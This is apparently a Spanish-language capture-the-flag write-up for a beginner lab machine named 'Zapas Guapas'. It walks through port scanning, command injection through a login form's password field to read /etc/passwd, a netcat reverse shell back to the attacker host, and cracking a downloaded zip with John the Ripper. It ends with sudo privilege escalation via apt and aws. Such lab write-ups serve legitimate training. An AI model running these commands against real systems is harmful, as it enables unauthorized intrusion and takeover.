Zapas Guapas

🔍 Dificultad: Principiante

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.70

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -sVC -p- -n --min-rate 5000 192.168.1.70

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 192.168.1.70

para obtener más información sobre ese puerto específicamente.

Seguimos indagando más sobre los puertos y ahora exploramos el servicio HTTP. Ingresamos la IP y nos encontramos la página de una tienda de zapatillas.

Ahora buscaremos directorios con la herramienta Gobuster a través de:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://192.168.1.68

Vemos que hay un archivo login.html que revisaremos.

Probando varias opciones me he dado cuenta que hay una ejecución remota de comandos por lo que a poner cualquier usuario y añadir en el campo contraseña el comando:

cat /etc/passwd

Nos damos cuenta de 3 usuarios root, pronike y proadidas. Voy a realizar una Reverse Shell.

busybox nc 192.168.1.50 443 -e sh

Tras ponerme en escucha y realizar tratamiento de la TTY. Como se nos muestra aquí: Tratamiento de la TTY. Indagando en el usuario pronike encontramos un archivo nota.txt.

También encontramos en el directorio /opt un zip que nos descargamos a nuestra máquina local.

En la máquina víctima
python3 -m http.server 8080
En la máquina atacante
wget http://192.168.1.70:8080/importante.zip

🚀 EXPLOTACIÓN

Ahora realizamos fuerza bruta.

zip2john importante.zip > hash_zip

john hash_zip --wordlist=/usr/share/wordlists/rockyou.txt 

Obtenemos la contraseña para descomprimir el .zip.

ssh pronike@192.168.1.70

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Tenemos permisos sudo en apt. Para más detalles, visitamos GTFObins - apt.

Repetimos el proceso, por lo que hacemos:

sudo -l

Tenemos permisos sudo en aws. Para más detalles, visitamos GTFObins - AWS

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀